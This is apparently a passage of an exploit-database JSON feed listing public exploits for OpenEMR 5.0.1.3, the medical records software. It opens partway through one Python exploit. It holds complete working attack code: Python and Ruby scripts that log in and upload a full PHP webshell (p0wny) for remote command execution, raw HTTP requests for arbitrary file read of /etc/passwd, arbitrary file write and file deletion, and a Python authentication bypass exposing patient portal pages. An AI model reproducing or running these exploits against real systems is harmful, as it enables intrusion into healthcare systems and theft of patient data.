historyPosition--;\\n eShellCmdInput.blur();\\n eShellCmdInput.value = commandHistory[historyPosition];\\n _defer(function() {\\n eShellCmdInput.focus();\\n });\\n }\\n break;\\n case \\\"ArrowDown\\\":\\n if (historyPosition >= commandHistory.length) {\\n break;\\n }\\n historyPosition++;\\n if (historyPosition === commandHistory.length) {\\n eShellCmdInput.value = \\\"\\\";\\n } else {\\n eShellCmdInput.blur();\\n eShellCmdInput.focus();\\n eShellCmdInput.value = commandHistory[historyPosition];\\n }\\n break;\\n case 'Tab':\\n event.preventDefault();\\n featureHint();\\n break;\\n }\\n }\\n\\n function insertToHistory(cmd) {\\n commandHistory.push(cmd);\\n historyPosition = commandHistory.length;\\n }\\n\\n function makeRequest(url, params, callback) {\\n function getQueryString() {\\n var a = [];\\n for (var key in params) {\\n if (params.hasOwnProperty(key)) {\\n a.push(encodeURIComponent(key) + \\\"=\\\" + encodeURIComponent(params[key]));\\n }\\n }\\n return a.join(\\\"&\\\");\\n }\\n var xhr = new XMLHttpRequest();\\n xhr.open(\\\"POST\\\", url, true);\\n xhr.setRequestHeader(\\\"Content-Type\\\", \\\"application/x-www-form-urlencoded\\\");\\n xhr.onreadystatechange = function() {\\n if (xhr.readyState === 4 && xhr.status === 200) {\\n try {\\n var responseJson = JSON.parse(xhr.responseText);\\n callback(responseJson);\\n } catch (error) {\\n alert(\\\"Error while parsing response: \\\" + error);\\n }\\n }\\n };\\n xhr.send(getQueryString());\\n }\\n\\n document.onclick = function(event) {\\n event = event || window.event;\\n var selection = window.getSelection();\\n var target = event.target || event.srcElement;\\n\\n if (target.tagName === \\\"SELECT\\\") {\\n return;\\n }\\n\\n if (!selection.toString()) {\\n eShellCmdInput.focus();\\n }\\n };\\n\\n window.onload = function() {\\n eShellCmdInput = document.getElementById(\\\"shell-cmd\\\");\\n eShellContent = document.getElementById(\\\"shell-content\\\");\\n updateCwd();\\n eShellCmdInput.focus();\\n };\\n </script>\\n </head>\\n\\n <body>\\n <div id=\\\"shell\\\">\\n <pre id=\\\"shell-content\\\">\\n <div id=\\\"shell-logo\\\">\\n ___ ____ _ _ _ _ _ <span></span>\\n _ __ / _ \\\\__ ___ __ _ _ / __ \\\\ ___| |__ ___| | |_ /\\\\/|| || |_ <span></span>\\n| '_ \\\\| | | \\\\ \\\\ /\\\\ / / '_ \\\\| | | |/ / _` / __| '_ \\\\ / _ \\\\ | (_)/\\\\/_ .. _|<span></span>\\n| |_) | |_| |\\\\ V V /| | | | |_| | | (_| \\\\__ \\\\ | | | __/ | |_ |_ _|<span></span>\\n| .__/ \\\\___/ \\\\_/\\\\_/ |_| |_|\\\\__, |\\\\ \\\\__,_|___/_| |_|\\\\___|_|_(_) |_||_| <span></span>\\n|_| |___/ \\\\____/ <span></span>\\n </div>\\n </pre>\\n <div id=\\\"shell-input\\\">\\n <label for=\\\"shell-cmd\\\" id=\\\"shell-prompt\\\" class=\\\"shell-prompt\\\">???</label>\\n <div>\\n <input id=\\\"shell-cmd\\\" name=\\\"cmd\\\" onkeydown=\\\"_onShellCmdKeyDown(event)\\\"/>\\n </div>\\n </div>\\n </div>\\n </body>\\n\\n</html>\\n\\r\\n-----------------------------31900464228840324774249185339\\r\\nContent-Disposition: form-data; name=\\\"form_dest_filename\\\"\\r\\n\\r\\n\\r\\n-----------------------------31900464228840324774249185339\\r\\nContent-Disposition: form-data; name=\\\"form_education\\\"; filename=\\\"\\\"\\r\\nContent-Type: application/octet-stream\\r\\n\\r\\n\\r\\n-----------------------------31900464228840324774249185339\\r\\nContent-Disposition: form-data; name=\\\"bn_save\\\"\\r\\n\\r\\nSave\\r\\n-----------------------------31900464228840324774249185339--\\r\\n\"\n\n# Send Exploit:\nsession.post(exploit_url, headers=header, data=body)\n\n# Finish\npath = 'http://' + target_ip + ':' + target_port + openemr_path + '/sites/default/images/shell.php'\nprint('[+] Webshell: ' + path)\n", "sourceHref": "https://0day.today/exploit/36407", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-12-20T11:35:52", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-13T00:00:00", "type": "zdt", "title": "OpenEMR 5.0.1.3 - (manage_site_files) Remote Code Execution (Authenticated) Exploit (2)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15139", "CVE-2019-14530"], "modified": "2021-07-13T00:00:00", "id": "1337DAY-ID-36549", "href": "https://0day.today/exploit/description/36549", "sourceData": "# Title: OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) (2)\n# Exploit author: noraj (Alexandre ZANNI) for SEC-IT (http://secit.fr)\n# Vendor Homepage: https://www.open-emr.org/\n# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz\n# Docker PoC: https://github.com/sec-it/exploit-CVE-2018-15139/blob/master/docker-compose.yml\n# Version: < 5.0.1.4 (it means up to 5.0.1.3)\n# Tested on: OpenEMR Version 5.0.0.8\n# References: https://www.exploit-db.com/exploits/49998\n# CVE: CVE-2018-15139\n# CWE: CWE-434\n# Patch: https://github.com/openemr/openemr/pull/1757/commits/c2808a0493243f618bbbb3459af23c7da3dc5485\n\n#!/usr/bin/env ruby\n\nrequire 'pathname'\nrequire 'httpx'\nrequire 'http/form_data'\nrequire 'docopt'\n\ndoc = <<~DOCOPT\n OpenEMR < 5.0.1.4 - (Authenticated) File upload - Remote command execution\n\n Source: https://github.com/sec-it/exploit-CVE-2019-14530\n\n Usage:\n #{__FILE__} exploit <url> <filename> <username> <password> [--debug]\n #{__FILE__} -h | --help\n\n Options:\n <url> Root URL (base path) including HTTP scheme, port and root folder\n <filename> Filename of the shell to be uploaded\n <username> Username of the admin\n <password> Password of the admin\n --debug Display arguments\n -h, --help Show this screen\n\n Examples:\n #{__FILE__} exploit http://example.org/openemr shell.php admin pass\n #{__FILE__} exploit https://example.org:5000/ shell.php admin pass\nDOCOPT\n\ndef login(root_url, user, pass, http)\n vuln_url = \"#{root_url}/interface/main/main_screen.php?auth=login&site=default\"\n params = {\n 'new_login_session_management' => '1',\n 'authProvider' => 'Default',\n 'authUser' => user,\n 'clearPass' => pass,\n 'languageChoice' => '1'\n }\n\n http.post(vuln_url, form: params).body.to_s\nend\n\ndef upload(root_url, filepath, http)\n vuln_url = \"#{root_url}/interface/super/manage_site_files.php\"\n pn = Pathname.new(filepath)\n\n params = {\n form_image: {\n content_type: 'application/x-php',\n filename: pn.basename.to_s,\n body: pn\n },\n bn_save: 'Save'\n }\n\n res = http.post(vuln_url, form: params)\n\n return '[-] File not upload' unless (200..299).include?(res.status)\n\n \"[+] File uploaded:\\n#{root_url}/sites/default/images/#{pn.basename}\"\nend\n\nbegin\n args = Docopt.docopt(doc)\n pp args if args['--debug']\n\n if args['exploit']\n http = HTTPX.plugin(:cookies).plugin(:follow_redirects).plugin(:multipart)\n login(args['<url>'], args['<username>'], args['<password>'], http)\n puts upload(args['<url>'], args['<filename>'], http)\n end\nrescue Docopt::Exit => e\n puts e.message\nend\n", "sourceHref": "https://0day.today/exploit/36549", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2023-06-07T15:30:09", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-16T00:00:00", "type": "exploitdb", "title": "OpenEMR 5.0.1.3 - (Authenticated) Arbitrary File Actions", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["2018-15140", "2018-15141", "2018-15142", "CVE-2018-15140", "CVE-2018-15141", "CVE-2018-15142"], "modified": "2018-08-16T00:00:00", "id": "EDB-ID:45202", "href": "https://www.exploit-db.com/exploits/45202", "sourceData": "# Exploit Title: OpenEMR 5.0.1.3 - Arbitrary File Actions\n# Date: 2018-08-14\n# Exploit Author: Joshua Fam\n# Twitter : @Insecurity\n# Vendor Homepage: https://www.open-emr.org/\n# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz\n# Version: < 5.0.1.3\n# Tested on: Ubuntu LAMP, OpenEMR Version 5.0.1.3\n# CVE : CVE-2018-15142,CVE-2018-15141,CVE-2018-15140\n\n# 1.Arbitrary File Read:\n# In OpenEmr a user that has access to the portal can send a malcious\n# POST request to read arbitrary files.\n\n# i.Vulnerable Code:\n# if ($_POST['mode'] == 'get') {\n# echo file_get_contents($_POST['docid']);\n# exit;\n# }\n\n# ii. Proof of Concept:\nPOST /openemr/portal/import_template.php HTTP/1.1\nHost: hostname\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCookie: OpenEMR=k3m0vq90hhb5et06rib5l7l8fq; PHPSESSID=1dbh9mom6ib07jqovfusgjc3vs\nConnection: close\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 26\n\nmode=get&docid=/etc/passwd\n\n# 2.Arbitrary File Write:\n# In OpenEmr a user that has access to the portal can send a malcious\n# POST request to write arbitrary files.\n\n# i. Vulnerable Code:\n# } else if ($_POST['mode'] == 'save') {\n# file_put_contents($_POST['docid'], $_POST['content']);\n# exit(true);\n# }\n\n# ii. Proof of Concept:\nPOST /openemr/portal/import_template.php HTTP/1.1\nHost: hostname\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCookie: OpenEMR=k3m0vq90hhb5et06rib5l7l8fq; PHPSESSID=1dbh9mom6ib07jqovfusgjc3vs\nConnection: close\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 54\n\nmode=save&docid=payload.php&content=<?php phpinfo();?>\n\n# After sending this navigate to payload.php at http://hostname/openemr/portal\n\n# 3. Arbitrary File Delete:\n# In OpenEmr a user that has access to the portal can send a malcious\n# POST request to delete a arbitrary file.\n\n# i. Vulnerable Code:\n# } else if ($_POST['mode'] == 'delete') {\n# unlink($_POST['docid']);\n# exit(true);\n# }\n\n# ii. Proof of Concept:\nPOST /openemr/portal/import_template.php HTTP/1.1\nHost: 127.0.0.1\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCookie: OpenEMR=k3m0vq90hhb5et06rib5l7l8fq; PHPSESSID=1dbh9mom6ib07jqovfusgjc3vs\nConnection: close\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 29\n\nmode=delete&docid=payload.php\n\n# After completing this request, when you navigate to payload.php, you should be greeted by a 404 page.", "sourceHref": "https://gitlab.com/exploit-database/exploitdb/-/raw/main/exploits/linux/webapps/45202.txt", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-07T15:19:43", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-06-16T00:00:00", "type": "exploitdb", "title": "OpenEMR 5.0.1.3 - Authentication Bypass", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["2018-15152", "CVE-2018-15152"], "modified": "2021-06-16T00:00:00", "id": "EDB-ID:50017", "href": "https://www.exploit-db.com/exploits/50017", "sourceData": "# Exploit Title: OpenEMR 5.0.1.3 - '/portal/account/register.php' Authentication Bypass\n# Date 15.06.2021\n# Exploit Author: Ron Jost (Hacker5preme)\n# Vendor Homepage: https://www.open-emr.org/\n# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_3.zip\n# Version: All versions prior to 5.0.1.4\n# Tested on: Ubuntu 18.04\n# CVE: CVE-2018-15152\n# CWE: CWE-287\n# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2018-15152-Exploit\n\n'''\nDescription:\nAn unauthenticated user is able to bypass the Patient Portal Login by simply navigating to\nthe registration page and modifying the requested url to access the desired page. Some\nexamples of pages in the portal directory that are accessible after browsing to the\nregistration page include:\n- add_edit_event_user.php\n- find_appt_popup_user.php\n- get_allergies.php\n- get_amendments.php\n- get_lab_results.php\n- get_medications.php\n- get_patient_documents.php\n- get_problems.php\n- get_profile.php\n- portal_payment.php\n- messaging/messages.php\n- messaging/secure_chat.php\n- report/pat_ledger.php\n- report/portal_custom_report.php\n- report/portal_patient_report.php\nNormally, access to these pages requires authentication as a patient. If a user were to visit\nany of those pages unauthenticated, they would be redirected to the login page.\n'''\n\n\n'''\nImport required modules:\n'''\nimport requests\nimport argparse\n\n\n'''\nUser-Input:\n'''\nmy_parser = argparse.ArgumentParser(description='OpenEMR Authentication bypass')\nmy_parser.add_argument('-T', '--IP', type=str)\nmy_parser.add_argument('-P', '--PORT', type=str)\nmy_parser.add_argument('-U', '--Openemrpath', type=str)\nmy_parser.add_argument('-R', '--PathToGet', type=str)\nargs = my_parser.parse_args()\ntarget_ip = args.IP\ntarget_port = args.PORT\nopenemr_path = args.Openemrpath\npathtoread = args.PathToGet\n\n\n'''\nCheck for vulnerability:\n'''\n# Check, if Registration portal is enabled. If it is not, this exploit can not work\nsession = requests.Session()\ncheck_vuln_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/portal/account/register.php'\ncheck_vuln = session.get(check_vuln_url).text\nprint('')\nprint('[*] Checking vulnerability: ')\nprint('')\n\nif \"Enter email address to receive registration.\" in check_vuln:\n print('[+] Host Vulnerable. Proceeding exploit')\nelse:\n print('[-] Host is not Vulnerable: Registration for patients is not enabled')\n\n'''\nExploit:\n'''\nheader = {\n 'Referer': check_vuln_url\n}\nexploit_url = 'http://' + target_ip + ':' + target_port + openemr_path + pathtoread\nExploit = session.get(exploit_url, headers=header)\nprint('')\nprint('[+] Results: ')\nprint('')\nprint(Exploit.text)\nprint('')", "sourceHref": "https://gitlab.com/exploit-database/exploitdb/-/raw/main/exploits/php/webapps/50017.py", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2023-06-07T15:19:47", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-14T00:00:00", "type": "exploitdb", "title": "OpenEMR 5.0.1.3 - &#039;manage_site_files&#039; Remote Code Execution (Authenticated)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["2018-15139", "CVE-2018-15139"], "modified": "2021-06-14T00:00:00", "id": "EDB-ID:49998", "href": "https://www.exploit-db.com/exploits/49998", "sourceData": "# Exploit Title: OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated)\n# Date 12.06.2021\n# Exploit Author: Ron Jost (Hacker5preme)\n# Vendor Homepage: https://www.open-emr.org/\n# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_3.zip\n# Version: Prior to 5.0.1.4\n# Tested on: Ubuntu 18.04\n# CVE: CVE-2018-15139\n# CWE: CWE-434\n# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2018-15139\n\n'''\nDescription:\nUnrestricted file upload in interface/super/manage_site_files.php in versions of OpenEMR before 5.0.1.4 allows a remote\nauthenticated attacker to execute arbitrary PHP code by uploading a file with a PHP extension via the images upload\nform and accessing it in the images directory.\n'''\n\n\n'''\nBanner:\n'''\nbanner =\"\"\"\n ___ _____ __ __ ____ ____ ___ _ _____\n / _ \\ _ __ ___ _ __ | ____| \\/ | _ \\ | ___| / _ \\ / | |___ /\n | | | | '_ \\ / _ \\ '_ \\| _| | |\\/| | |_) | _____ |___ \\| | | || | |_ \\\n | |_| | |_) | __/ | | | |___| | | | _ < |_____| ___) | |_| || |_ ___) |\n \\___/| .__/ \\___|_| |_|_____|_| |_|_| \\_\\ |____(_)___(_)_(_)____/\n |_|\n\n _____ _ _ _\n | ____|_ ___ __ | | ___ (_) |_\n | _| \\ \\/ / '_ \\| |/ _ \\| | __|\n | |___ > <| |_) | | (_) | | |_\n |_____/_/\\_\\ .__/|_|\\___/|_|\\__|\n |_|\n\n\"\"\"\nprint(banner)\n\n\n'''\nImport required modules\n'''\nimport argparse\nimport requests\n\n\n'''\nUser-Input:\n'''\nmy_parser = argparse.ArgumentParser(description='OpenEMR Remote Code Execution')\nmy_parser.add_argument('-T', '--IP', type=str)\nmy_parser.add_argument('-P', '--PORT', type=str)\nmy_parser.add_argument('-U', '--PATH', type=str)\nmy_parser.add_argument('-u', '--USERNAME', type=str)\nmy_parser.add_argument('-p', '--PASSWORD', type=str)\nargs = my_parser.parse_args()\ntarget_ip = args.IP\ntarget_port = args.PORT\nopenemr_path = args.PATH\nusername = args.USERNAME\npassword = args.PASSWORD\n\n'''\nAuthentication:\n'''\n# Preparation:\nsession = requests.Session()\nauth_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/main/main_screen.php?auth=login&site=default'\nauth_chek_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/login/login.php?site=default'\nresponse = session.get(auth_chek_url)\n\n# Header (auth):\nheader = {\n 'Host': target_ip,\n 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\n 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',\n 'Accept-Encoding': 'gzip, deflate',\n 'Content-Type': 'application/x-www-form-urlencoded',\n 'Origin': 'http://' + target_ip,\n 'Connection': 'close',\n 'Referer': auth_chek_url,\n 'Upgrade-Insecure-Requests': '1',\n}\n\n# Body (auth):\nbody = {\n 'new_login_session_management': '1',\n 'authProvider': 'Default',\n 'authUser': username,\n 'clearPass': password,\n 'languageChoice': '1'\n}\n\n# Authentication:\nprint('')\nprint('[+] Authentication')\nauth = session.post(auth_url,headers=header, data=body)\n\n\n'''\nExploit:\n'''\nprint('')\nprint('[+] Uploading Webshell:')\n\n# URL:\nexploit_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/super/manage_site_files.php'\n\n# Headers (Exploit):\nheader = {\n \"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0\",\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\",\n \"Accept-Language\": \"de,en-US;q=0.7,en;q=0.3\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Content-Type\": \"multipart/form-data; boundary=---------------------------31900464228840324774249185339\",\n \"Origin\": \"http://\" + target_ip,\n \"Connection\": \"close\",\n \"Referer\": 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/super/manage_site_files.php',\n \"Upgrade-Insecure-Requests\": \"1\"\n}\n\n# Body (Exploit):\nbody = \"-----------------------------31900464228840324774249185339\\r\\nContent-Disposition: form-data; name=\\\"form_filename\\\"\\r\\n\\r\\n\\r\\n-----------------------------31900464228840324774249185339\\r\\nContent-Disposition: form-data; name=\\\"form_filedata\\\"\\r\\n\\r\\n\\r\\n-----------------------------31900464228840324774249185339\\r\\nContent-Disposition: form-data; name=\\\"MAX_FILE_SIZE\\\"\\r\\n\\r\\n12000000\\r\\n-----------------------------31900464228840324774249185339\\r\\nContent-Disposition: form-data; name=\\\"form_image\\\"; filename=\\\"shell.php\\\"\\r\\nContent-Type: application/x-php\\r\\n\\r\\n<?php\\n\\nfunction featureShell($cmd, $cwd) {\\n $stdout = array();\\n\\n if (preg_match(\\\"/^\\\\s*cd\\\\s*$/\\\", $cmd)) {\\n // pass\\n } elseif (preg_match(\\\"/^\\\\s*cd\\\\s+(.+)\\\\s*(2>&1)?$/\\\", $cmd)) {\\n chdir($cwd);\\n preg_match(\\\"/^\\\\s*cd\\\\s+([^\\\\s]+)\\\\s*(2>&1)?$/\\\", $cmd, $match);\\n chdir($match[1]);\\n } elseif (preg_match(\\\"/^\\\\s*download\\\\s+[^\\\\s]+\\\\s*(2>&1)?$/\\\", $cmd)) {\\n chdir($cwd);\\n preg_match(\\\"/^\\\\s*download\\\\s+([^\\\\s]+)\\\\s*(2>&1)?$/\\\", $cmd, $match);\\n return featureDownload($match[1]);\\n } else {\\n chdir($cwd);\\n exec($cmd, $stdout);\\n }\\n\\n return array(\\n \\\"stdout\\\" => $stdout,\\n \\\"cwd\\\" => getcwd()\\n );\\n}\\n\\nfunction featurePwd() {\\n return array(\\\"cwd\\\" => getcwd());\\n}\\n\\nfunction featureHint($fileName, $cwd, $type) {\\n chdir($cwd);\\n if ($type == 'cmd') {\\n $cmd = \\\"compgen -c $fileName\\\";\\n } else {\\n $cmd = \\\"compgen -f $fileName\\\";\\n }\\n $cmd = \\\"/bin/bash -c \\\\\\\"$cmd\\\\\\\"\\\";\\n $files = explode(\\\"\\\\n\\\", shell_exec($cmd));\\n return array(\\n 'files' => $files,\\n );\\n}\\n\\nfunction featureDownload($filePath) {\\n $file = @file_get_contents($filePath);\\n if ($file === FALSE) {\\n return array(\\n 'stdout' => array('File not found / no read permission.'),\\n 'cwd' => getcwd()\\n );\\n } else {\\n return array(\\n 'name' => basename($filePath),\\n 'file' => base64_encode($file)\\n );\\n }\\n}\\n\\nfunction featureUpload($path, $file, $cwd) {\\n chdir($cwd);\\n $f = @fopen($path, 'wb');\\n if ($f === FALSE) {\\n return array(\\n 'stdout' => array('Invalid path / no write permission.'),\\n 'cwd' => getcwd()\\n );\\n } else {\\n fwrite($f, base64_decode($file));\\n fclose($f);\\n return array(\\n 'stdout' => array('Done.'),\\n 'cwd' => getcwd()\\n );\\n }\\n}\\n\\nif (isset($_GET[\\\"feature\\\"])) {\\n\\n $response = NULL;\\n\\n switch ($_GET[\\\"feature\\\"]) {\\n case \\\"shell\\\":\\n $cmd = $_POST['cmd'];\\n if (!preg_match('/2>/', $cmd)) {\\n $cmd .= ' 2>&1';\\n }\\n $response = featureShell($cmd, $_POST[\\\"cwd\\\"]);\\n break;\\n case \\\"pwd\\\":\\n $response = featurePwd();\\n break;\\n case \\\"hint\\\":\\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\\n break;\\n case 'upload':\\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\\n }\\n\\n header(\\\"Content-Type: application/json\\\");\\n echo json_encode($response);\\n die();\\n}\\n\\n?><!DOCTYPE html>\\n\\n<html>\\n\\n <head>\\n <meta charset=\\\"UTF-8\\\" />\\n <title>p0wny@shell:~#</title>\\n <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\" />\\n <style>\\n html, body {\\n margin: 0;\\n padding: 0;\\n background: #333;\\n color: #eee;\\n font-family: monospace;\\n }\\n\\n *::-webkit-scrollbar-track {\\n border-radius: 8px;\\n background-color: #353535;\\n }\\n\\n *::-webkit-scrollbar {\\n width: 8px;\\n height: 8px;\\n }\\n\\n *::-webkit-scrollbar-thumb {\\n border-radius: 8px;\\n -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);\\n background-color: #bcbcbc;\\n }\\n\\n #shell {\\n background: #222;\\n max-width: 800px;\\n margin: 50px auto 0 auto;\\n box-shadow: 0 0 5px rgba(0, 0, 0, .3);\\n font-size: 10pt;\\n display: flex;\\n flex-direction: column;\\n align-items: stretch;\\n }\\n\\n #shell-content {\\n height: 500px;\\n overflow: auto;\\n padding: 5px;\\n white-space: pre-wrap;\\n flex-grow: 1;\\n }\\n\\n #shell-logo {\\n font-weight: bold;\\n color: #FF4180;\\n text-align: center;\\n }\\n\\n @media (max-width: 991px) {\\n #shell-logo {\\n font-size: 6px;\\n margin: -25px 0;\\n }\\n\\n html, body, #shell {\\n height: 100%;\\n width: 100%;\\n max-width: none;\\n }\\n\\n #shell {\\n margin-top: 0;\\n }\\n }\\n\\n @media (max-width: 767px) {\\n #shell-input {\\n flex-direction: column;\\n }\\n }\\n\\n @media (max-width: 320px) {\\n #shell-logo {\\n font-size: 5px;\\n }\\n }\\n\\n .shell-prompt {\\n font-weight: bold;\\n color: #75DF0B;\\n }\\n\\n .shell-prompt > span {\\n color: #1BC9E7;\\n }\\n\\n #shell-input {\\n display: flex;\\n box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);\\n border-top: rgba(255, 255, 255, .05) solid 1px;\\n }\\n\\n #shell-input > label {\\n flex-grow: 0;\\n display: block;\\n padding: 0 5px;\\n height: 30px;\\n line-height: 30px;\\n }\\n\\n #shell-input #shell-cmd {\\n height: 30px;\\n line-height: 30px;\\n border: none;\\n background: transparent;\\n color: #eee;\\n font-family: monospace;\\n font-size: 10pt;\\n width: 100%;\\n align-self: center;\\n }\\n\\n #shell-input div {\\n flex-grow: 1;\\n align-items: stretch;\\n }\\n\\n #shell-input input {\\n outline: none;\\n }\\n </style>\\n\\n <script>\\n var CWD = null;\\n var commandHistory = [];\\n var historyPosition = 0;\\n var eShellCmdInput = null;\\n var eShellContent = null;\\n\\n function _insertCommand(command) {\\n eShellContent.innerHTML += \\\"\\\\n\\\\n\\\";\\n eShellContent.innerHTML += '<span class=\\\\\\\"shell-prompt\\\\\\\">' + genPrompt(CWD) + '</span> ';\\n eShellContent.innerHTML += escapeHtml(command);\\n eShellContent.innerHTML += \\\"\\\\n\\\";\\n eShellContent.scrollTop = eShellContent.scrollHeight;\\n }\\n\\n function _insertStdout(stdout) {\\n eShellContent.innerHTML += escapeHtml(stdout);\\n eShellContent.scrollTop = eShellContent.scrollHeight;\\n }\\n\\n function _defer(callback) {\\n setTimeout(callback, 0);\\n }\\n\\n function featureShell(command) {\\n\\n _insertCommand(command);\\n if (/^\\\\s*upload\\\\s+[^\\\\s]+\\\\s*$/.test(command)) {\\n featureUpload(command.match(/^\\\\s*upload\\\\s+([^\\\\s]+)\\\\s*$/)[1]);\\n } else if (/^\\\\s*clear\\\\s*$/.test(command)) {\\n 